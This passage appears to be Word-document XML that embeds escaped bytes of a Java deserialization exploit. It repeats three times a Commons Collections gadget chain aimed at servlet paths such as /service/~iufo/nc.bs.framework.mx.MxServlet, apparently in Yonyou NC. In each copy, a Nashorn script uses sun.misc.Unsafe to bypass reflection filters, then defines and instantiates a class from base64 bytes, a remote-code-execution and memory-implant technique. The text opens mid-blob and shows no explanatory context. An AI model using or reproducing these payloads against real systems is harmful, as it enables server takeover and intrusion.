\xa9\xff\x18\x7f\xcc\x0b\x94d\xbd\x12\xb3\xd6\x03\xb0G\x959\x14\x86\xffF\xb0u\xac\xf2,\xf4\xd4\x1bP\xad$\xbe\xde0\x861\x18\x00\xd33\xaa\x84\xbbZ\x88\xc6\xcf\x16\xa4\x8c#4\x02s\x0c'\xd4\xd0\x9f\x940\xdc\xcd|\xa6\x9e\xcd|\x11\xcf\x98\xbb\xd9\xad\xf28\xd7n\xf0Z\xd5\x10\x0b\xa5e.K\xa4\xd4\xcc\xf1\x7b\xf0\x18\xa1A\xbc\x07-\xe2U2\x94\xc7\xb9\xb9e\xae\xd3\x19\xfe\xfei.\x1c\xa5\xf3#\xce\x09\xdb9\xef!\xfd\x8c\xb0T\x81\xf2\xaa\xb2\x06\x96\x9b\xf5\xca\xb5CuQi\xf0\xec\x803\xc5\xcb\xfd87Uy\xee\xdc\xcd\xa5\xebY:[\xa2\x91D\xfcjUP_\x94\x1c\xd0\x92\xd5\xfe*\x7f\xc9\xc5\xe9i\x88\x15\x14\xe4\x99\xf0\x92*\x7dz\xe0\x99pW\x0b\xd0#\x15v\x0d\xbf&lt;\x05~\xc49\"A\xba\x1b\x7d$ \xcf^\x8a\x10\x09\xe5\xc9\xf0\xd1\x88\x94\x0az\xad\x90\x0d\x0c\x84F\x04, \xa7K\xbeP\x0c8\xa9\xa9\xf3\xefw\xb4\xc0_\xa8\x1e\xfc\xdf4\xe8\xc1S\xd2\x98&gt;\xa4\x9d\\\xc7\x00\xf8\xf5\xd7o?|\xf9\xe2\x17!O^\xf9\x7d9~\x7bz\xfa\x01\xb4\xcf\x7f\xcd\xeaC|\xf4C\x97\xff\xa0\xef\xf1/\x8f\xf8\xcd_|\xf9\x87\x835\x7b\xf6\xa3\x9f\xfb\xe3?\xf8\xb7\xbf\xf2\xd7\xff\xe3\x17Go\xd4\xa3/\xf9\xaf\x8c\xd4\xf4\xaf\xee\xf4\xa3\x9f\x8fGs7\x1a\x85\x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c1p5\xdb\xfe-\xe1Q\xf2g\xf0\xe3\xc7\xe9\x9f\x82\xadV\xff\x07b\xa7\xd6L\x8d8\x00\x00")}}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/service/~tbb/nc.bs.ntb.plugin.ServletCommander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16284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\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t45try \x7b\x0a  load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a  var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x29;\x0a  theUnsafeMethod.setAccessible\x28true\x29; \x0a  return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a  unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a  var reflectionClass;\x0a  try \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a  \x7d catch \x28error\x29 \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a  \x7d\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x0a  var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a  if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0afunction setAccessible\x28accessibleObject\x29\x7b\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    var unsafe = getUnsafe\x28\x29;\x0a    var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\x28\"override\"\x29;\x0a    var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a    unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a  var clz = null;\x0a  var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a  try\x7b\x0a    if \x28version.split\x28\".\"\x29[0] &gt;= 11\x29 \x7b\x0a      bypassReflectionFilter\x28\x29;\x0a    defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineClass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a    setAccessible\x28defineClassMethod\x29;\x0a    // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a    clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a    \x7delse\x7b\x0a      var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a      clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a    \x7d\x0a  \x7dcatch\x28error\x29\x7b\x0a    error.printStackTrace\x28\x29;\x0a  \x7dfinally\x7b\x0a    return clz;\x0a  \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a  var bt;\x0a  try\x7b\x0a    bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuffer\x28str\x29;\x0a  \x7dcatch\x28e\x29\x7b\x7d\x0a  if \x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if\x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if \x28bt == null\x29\x7b\x0a    bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x28\x29.decode\x28str\x29;\x0a  \x7d\x0a  return bt;\x0a\x7d\x0avar code=\"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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\";\x0aclz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04evaluq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>orI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}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/service/~iufo/nc.bs.framework.mx.MxServlet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16284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\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t45try \x7b\x0a  load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a  var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x29;\x0a  theUnsafeMethod.setAccessible\x28true\x29; \x0a  return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a  unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a  var reflectionClass;\x0a  try \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a  \x7d catch \x28error\x29 \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a  \x7d\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x0a  var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a  if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0afunction setAccessible\x28accessibleObject\x29\x7b\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    var unsafe = getUnsafe\x28\x29;\x0a    var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\x28\"override\"\x29;\x0a    var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a    unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a  var clz = null;\x0a  var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a  try\x7b\x0a    if \x28version.split\x28\".\"\x29[0] &gt;= 11\x29 \x7b\x0a      bypassReflectionFilter\x28\x29;\x0a    defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineClass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a    setAccessible\x28defineClassMethod\x29;\x0a    // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a    clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a    \x7delse\x7b\x0a      var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a      clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a    \x7d\x0a  \x7dcatch\x28error\x29\x7b\x0a    error.printStackTrace\x28\x29;\x0a  \x7dfinally\x7b\x0a    return clz;\x0a  \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a  var bt;\x0a  try\x7b\x0a    bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuffer\x28str\x29;\x0a  \x7dcatch\x28e\x29\x7b\x7d\x0a  if \x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if\x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if \x28bt == null\x29\x7b\x0a    bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x28\x29.decode\x28str\x29;\x0a  \x7d\x0a  return bt;\x0a\x7d\x0avar code=\"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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\";\x0aclz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04evaluq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>orI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}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/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet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16284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\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x04sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00 javax.script.ScriptEngineManager\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0bnewInstanceur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t\x00\x02jst\x00\x0fgetEngineByNameuq\x00~\x00\x1b\x00\x00\x00\x01vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpsq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01t45try \x7b\x0a  load\x28\"nashorn:mozilla_compat.js\"\x29;\x0a\x7d catch \x28e\x29 \x7b\x7d\x0afunction getUnsafe\x28\x29\x7b\x0a  var theUnsafeMethod = java.lang.Class.forName\x28\"sun.misc.Unsafe\"\x29.getDeclaredField\x28\"theUnsafe\"\x29;\x0a  theUnsafeMethod.setAccessible\x28true\x29; \x0a  return theUnsafeMethod.get\x28null\x29;\x0a\x7d\x0afunction removeClassCache\x28clazz\x29\x7b\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var clazzAnonymousClass = unsafe.defineAnonymousClass\x28clazz,java.lang.Class.forName\x28\"java.lang.Class\"\x29.getResourceAsStream\x28\"Class.class\"\x29.readAllBytes\x28\x29,null\x29;\x0a  var reflectionDataField = clazzAnonymousClass.getDeclaredField\x28\"reflectionData\"\x29;\x0a  unsafe.putObject\x28clazz,unsafe.objectFieldOffset\x28reflectionDataField\x29,null\x29;\x0a\x7d\x0afunction bypassReflectionFilter\x28\x29 \x7b\x0a  var reflectionClass;\x0a  try \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"jdk.internal.reflect.Reflection\"\x29;\x0a  \x7d catch \x28error\x29 \x7b\x0a    reflectionClass = java.lang.Class.forName\x28\"sun.reflect.Reflection\"\x29;\x0a  \x7d\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classBuffer = reflectionClass.getResourceAsStream\x28\"Reflection.class\"\x29.readAllBytes\x28\x29;\x0a  var reflectionAnonymousClass = unsafe.defineAnonymousClass\x28reflectionClass, classBuffer, null\x29;\x0a  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"fieldFilterMap\"\x29;\x0a  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField\x28\"methodFilterMap\"\x29;\x0a  if \x28fieldFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28fieldFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  if \x28methodFilterMapField.getType\x28\x29.isAssignableFrom\x28java.lang.Class.forName\x28\"java.util.HashMap\"\x29\x29\x29 \x7b\x0a    unsafe.putObject\x28reflectionClass, unsafe.staticFieldOffset\x28methodFilterMapField\x29, java.lang.Class.forName\x28\"java.util.HashMap\"\x29.getConstructor\x28\x29.newInstance\x28\x29\x29;\x0a  \x7d\x0a  removeClassCache\x28java.lang.Class.forName\x28\"java.lang.Class\"\x29\x29;\x0a\x7d\x0afunction setAccessible\x28accessibleObject\x29\x7b\x0a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    var unsafe = getUnsafe\x28\x29;\x0a    var overrideField = java.lang.Class.forName\x28\"java.lang.reflect.AccessibleObject\"\x29.getDeclaredField\x28\"override\"\x29;\x0a    var offset = unsafe.objectFieldOffset\x28overrideField\x29;\x0a    unsafe.putBoolean\x28accessibleObject, offset, true\x29;\x0a\x7d\x0afunction defineClass\x28bytes\x29\x7b\x0a  var clz = null;\x0a  var version = java.lang.System.getProperty\x28\"java.version\"\x29;\x0a  var unsafe = getUnsafe\x28\x29;\x0a  var classLoader = new java.net.URLClassLoader\x28java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.net.URL\"\x29, 0\x29\x29;\x0a  try\x7b\x0a    if \x28version.split\x28\".\"\x29[0] &gt;= 11\x29 \x7b\x0a      bypassReflectionFilter\x28\x29;\x0a    defineClassMethod = java.lang.Class.forName\x28\"java.lang.ClassLoader\"\x29.getDeclaredMethod\x28\"defineClass\", java.lang.Class.forName\x28\"[B\"\x29,java.lang.Integer.TYPE, java.lang.Integer.TYPE\x29;\x0a    setAccessible\x28defineClassMethod\x29;\x0a    // \xe7\xbb\x95\xe8\xbf\x87 setAccessible \x0a    clz = defineClassMethod.invoke\x28classLoader, bytes, 0, bytes.length\x29;\x0a    \x7delse\x7b\x0a      var protectionDomain = new java.security.ProtectionDomain\x28new java.security.CodeSource\x28null, java.lang.reflect.Array.newInstance\x28java.lang.Class.forName\x28\"java.security.cert.Certificate\"\x29, 0\x29\x29, null, classLoader, []\x29;\x0a      clz = unsafe.defineClass\x28null, bytes, 0, bytes.length, classLoader, protectionDomain\x29;\x0a    \x7d\x0a  \x7dcatch\x28error\x29\x7b\x0a    error.printStackTrace\x28\x29;\x0a  \x7dfinally\x7b\x0a    return clz;\x0a  \x7d\x0a\x7d\x0afunction base64DecodeToByte\x28str\x29 \x7b\x0a  var bt;\x0a  try\x7b\x0a    bt = java.lang.Class.forName\x28\"sun.misc.BASE64Decoder\"\x29.newInstance\x28\x29.decodeBuffer\x28str\x29;\x0a  \x7dcatch\x28e\x29\x7b\x7d\x0a  if \x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.lang.Class.forName\x28\"java.util.Base64\"\x29.newInstance\x28\x29.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if\x28bt == null\x29\x7b\x0a    try\x7b\x0a      bt = java.util.Base64.getDecoder\x28\x29.decode\x28str\x29;\x0a    \x7dcatch\x28e\x29\x7b\x7d\x0a  \x7d\x0a  if \x28bt == null\x29\x7b\x0a    bt = java.lang.Class.forName\x28\"org.apache.commons.codec.binary.Base64\"\x29.newInstance\x28\x29.decode\x28str\x29;\x0a  \x7d\x0a  return bt;\x0a\x7d\x0avar code=\"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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\";\x0aclz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04evaluq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
